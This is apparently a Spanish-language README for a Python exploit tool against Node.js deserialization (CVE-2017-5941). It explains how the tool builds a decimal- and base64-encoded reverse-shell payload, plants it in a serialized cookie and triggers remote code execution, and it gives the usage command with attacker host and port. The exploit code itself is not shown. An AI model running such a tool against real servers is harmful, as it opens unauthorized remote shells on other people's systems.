
Exploit de reverseshell para deserialización en NodeJs (CVE-2017-5941)
El exploit genera automáticamente el payload de reverse shell que está codificado en decimal y luego en base64. Después de eso, ese payload se envía mediante una solicitud HTTP POST que serializa la entrada del usuario y la almacena en una cookie. Entonces conseguimos el RCE accediendo mediante una solicitud GET.
Modo de uso:
python3 nodejshell.py <lhost> <lport>
lhost: tu dirección IP local lport: el puerto en el que deseas conectar tu reverse shell
Después de eso solo necesitas proporcionar alguna información simple:
Hecho esto, solo activa tu listener preferido y espera recibir la conexión.
